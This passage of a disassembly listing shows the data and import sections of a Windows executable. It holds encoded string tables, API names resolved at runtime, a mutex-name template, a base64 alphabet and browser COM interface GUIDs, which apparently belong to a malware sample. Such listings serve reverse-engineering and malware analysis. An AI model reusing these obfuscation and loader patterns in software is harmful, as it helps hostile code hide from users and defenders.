byte_44D767 db 0 ; DATA XREF: sub_43BDDE+113�o
dd 6547AD00h, 6E695774h, 776F64h
dword_44D774 dd 47940000h, 654D7465h, 67617373h ; DATA XREF: sub_43BDDE+F7�o
db 65h, 41h, 0
byte_44D783 db 0 ; DATA XREF: sub_43BDDE+DB�o
dd 65472600h, 726F4674h, 6F726765h, 57646E75h, 6F646E69h
db 77h, 0
word_44D79A dw 0 ; DATA XREF: sub_43BDDE+BF�o
a5getclassnamea db '5GetClassNameA',0
byte_44D7AB db 0 ; DATA XREF: sub_43BDDE+A3�o
dd 69443D00h, 74617073h, 654D6863h, 67617373h
db 65h, 41h, 0
byte_44D7BF db 0 ; DATA XREF: sub_43BDDE+87�o
dd 65446800h, 6F727473h, 6E695779h, 776F64h
dword_44D7D0 dd 44C30000h, 69576665h, 776F646Eh, 636F7250h ; DATA XREF: sub_43BDDE+6B�o
db 41h, 0
word_44D7E2 dw 0 ; DATA XREF: sub_43BDDE+4F�o
aCreatewindowex db 'CreateWindowExA',0
byte_44D7F5 db 2 dup(0), 23h ; DATA XREF: sub_43BDDE:loc_43BE11�o
aCallwindowproc db 'CallWindowProcA',0
dword_44D808 dd 75D20000h, 33726573h, 6C642E32h ; DATA XREF: sub_43BDDE+1C�o
db 6Ch, 0
word_44D816 dw 0 ; DATA XREF: sub_43BDDE+1�o
aUser32_dll_0 db ',user32.dll',0
dword_44D824 dd 0AC89000Fh, 0EFEDD5FAh, 0F3FCACE5h, 0EDA7BBBAh
; DATA XREF: sub_43BB7B+5D�o
db 2 dup(0E5h), 0
byte_44D837 db 0Fh ; DATA XREF: sub_43BB7B+35�o
dd 0ADFBDE00h, 0FBB8B582h, 0EDA4B2ABh, 0B2BAF0ECh
db 0B2h, 0
word_44D84A dw 4 ; DATA XREF: sub_43B9CB+35�o
dd 0E3BAFCD9h
db 85h, 0
word_44D852 dw 0 ; DATA XREF: sub_43B7A3:loc_43B80C�o
dd 455320F4h, 43495652h
db 45h, 0
word_44D85E dw 0 ; DATA XREF: sub_43B7A3+29�o
aNsystem db 'NSYSTEM',0
dword_44D868 dd 6BB60000h, 762D716Bh ; DATA XREF: sub_43B6F6+2F�o
db 78h, 0
word_44D872 dw 0 ; DATA XREF: sub_43B6F6:loc_43B715�o
aS_mtxU_0 db '%s_mtx%u',0
asc_44D87E db 0Ah,0 ; DATA XREF: sub_43B69E+1C�o
aWbgKw@hh db '$WBG{KW',0Ah
db '@HH',0
dword_44D88C dd 73100000h, 6F5F6366h, 6C642E73h ; DATA XREF: sub_43B69E+1�o
db 6Ch, 0
word_44D89A dw 4 ; DATA XREF: sub_43B63B+1C�o
aIni db '',0
word_44D8A2 dw 0 ; DATA XREF: sub_43B4DD+A3�o
aDispgetparam db 'DispGetParam',0
word_44D8B2 dw 0 ; DATA XREF: sub_43B4DD+87�o
aVariantinit db ']VariantInit',0
byte_44D8C1 db 2 dup(0), 0F2h ; DATA XREF: sub_43B4DD+6B�o
aVariantclear db 'VariantClear',0
byte_44D8D1 db 2 dup(0), 57h ; DATA XREF: sub_43B4DD+4F�o
aSysfreestring db 'SysFreeString',0
word_44D8E2 dw 0 ; DATA XREF: sub_43B4DD:loc_43B510�o
aSysallocstring db 'SysAllocString',0
dword_44D8F4 dd 6F780000h, 7561656Ch, 2E323374h, 6C6C64h ; DATA XREF: sub_43B4DD+1C�o
dword_44D904 dd 6FE00000h, 7561656Ch, 2E323374h, 6C6C64h ; DATA XREF: sub_43B4DD+1�o
dword_44D914 dd 0B0900002h ; DATA XREF: sub_43B3B1+108�o
db 0B0h, 0
word_44D91A dw 1 ; DATA XREF: sub_43B3B1+D3�o
db 0C2h, 0EDh, 0
byte_44D91F db 12h ; DATA XREF: sub_43B3B1:loc_43B3E3�o
dd 0B6A8C500h, 0B6A9B1A6h, 0A4B1B69Ah, 0A7B6B0B1h, 0F7F6B7A4h
db 0
byte_44D935 db 0Eh, 0, 5Ch ; DATA XREF: sub_43B3B1+10�o
dd 0B3E3D08h, 33383235h, 3D301F2Bh
db 2 dup(2Fh), 0
byte_44D947 db 1 ; DATA XREF: sub_43A58C+D28�o
dd 5F2300h
dword_44D94C dd 0B1910002h ; DATA XREF: sub_43A58C+CFC�o
db 0EDh, 0
word_44D952 dw 1 ; DATA XREF: sub_43A58C+C71�o
db 0F5h, 0CFh, 0
byte_44D957 db 4 ; DATA XREF: sub_43A58C:loc_43B1B7�o
dd 6B6E4E00h
db 3Bh, 74h, 0
byte_44D95F db 1 ; DATA XREF: sub_43A58C+6AA�o
dd 0EE9200h
dword_44D964 dd 5474000Ah, 263B3248h, 1514E39h ; DATA XREF: sub_43A58C+475�o
db 4Ah, 0
word_44D972 dw 0Bh ; DATA XREF: sub_43A58C:loc_43A912�o
dd 9CE6FADAh, 9F979B88h, 0E4AFFFE0h
db 0
byte_44D981 db 0Ah, 0, 94h ; DATA XREF: sub_43A58C+293�o
aIOK db 'Ѯ٪',0
align 10h
dword_44D990 dd 4, 0A600C8h, 0A500A9h, 0ADh ; DATA XREF: sub_43A58C+21B�o
dword_44D9A0 dd 5, 330045h, 290024h, 200030h ; DATA XREF: sub_43A58C+204�o
db 2 dup(0)
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
; DATA XREF: .data:off_44C2BC�o
db '://',0
align 4
dword_44D9F8 dd 9BA05972h, 11CFF6A8h, 0A00042A4h, 398F0AC9h ; DATA XREF: sub_43F6B1+58�o
dword_44DA08 dd 0FE4106E0h, 11D0399Ah, 0A0008CA4h, 398F0AC9h
; DATA XREF: sub_43E48C:loc_43E4D8�o
; sub_43F6B1+1CB�o ...
dword_44DA18 dd 34A715A0h, 11D06587h, 20004A92h, 4DACC7AFh
; DATA XREF: sub_43B5B8:loc_43B604�o
; sub_43B857+CB�o ...
dword_44DA28 dd 3050F25Bh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h
; DATA XREF: sub_442CD0:loc_442D1C�o
dword_44DA38 dd 0B196B284h, 101ABAB4h, 0AA009CB6h, 71D3400h ; DATA XREF: sub_44163D+1F�o
dword_44DA48 dd 20400h, 0 ; DATA XREF: sub_43B5B8:loc_43B5E4�o
; sub_43E48C:loc_43E4B8�o ...
dd 0C0h, 46000000h
dword_44DA58 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43A58C+183�o
; sub_43C974+152�o
dword_44DA68 dd 3050F21Fh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43E5EA+68�o
; sub_44206A+70�o
dword_44DA78 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43A58C+4B8�o
; sub_43A58C+AC3�o ...
dword_44DA88 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43A58C+9D6�o
dword_44DA98 dd 3050F240h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43E5EA+1F9�o
dword_44DAA8 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43A58C+2E9�o
dword_44DAB8 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7h ; DATA XREF: sub_43F6B1+4F�o
dword_44DAC8 dd 2 dup(0) ; DATA XREF: sub_43B5B8+C�o
; sub_43E48C+C�o ...
dd 0C0h, 46000000h
dword_44DAD8 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fh ; DATA XREF: sub_43A58C+81�o
; sub_43B857+90�o ...
dword_44DAE8 dd 10h dup(0) ; DATA XREF: sub_444580�o
; sub_444580:loc_44459A�o ...
dword_44DB28 dd 0 ; DATA XREF: sub_444524+16�o
; sub_444524:loc_444566�o ...
dd 0Fh dup(0)
dword_44DB68 dd 0 ; DATA XREF: sub_444689+C�w
; sub_444689+825�r
dword_44DB6C dd 0 ; DATA XREF: sub_444689+14�w
; sub_444689+82C�r
dword_44DB70 dd 0 ; DATA XREF: sub_444689+1C�w
; sub_444689+834�r
dword_44DB74 dd 0 ; DATA XREF: sub_444689+24�w
; sub_444689+83C�r
align 100h
_data ends
; Section 7. (virtual address 0004E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004DC00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44E000h
dd 2Bh dup(0)
dword_44E0AC dd 0 ; DATA XREF: .text:00444FB8�r
dword_44E0B0 dd 0 ; DATA XREF: sub_444FC4�r
dword_44E0B4 dd 0 ; DATA XREF: sub_444FD0�r
align 10h
dword_44E0C0 dd 0 ; DATA XREF: sub_444FDC�r
dword_44E0C4 dd 0 ; DATA XREF: sub_444FE8�r
dword_44E0C8 dd 0 ; DATA XREF: .text:00444FF4�r
dword_44E0CC dd 0 ; DATA XREF: .text:00445000�r
dword_44E0D0 dd 0 ; DATA XREF: sub_44500C�r
dword_44E0D4 dd 0 ; DATA XREF: sub_445018�r
dword_44E0D8 dd 0 ; DATA XREF: sub_445024�r
dword_44E0DC dd 0 ; DATA XREF: sub_445030�r
align 1000h
_idata2 ends
end start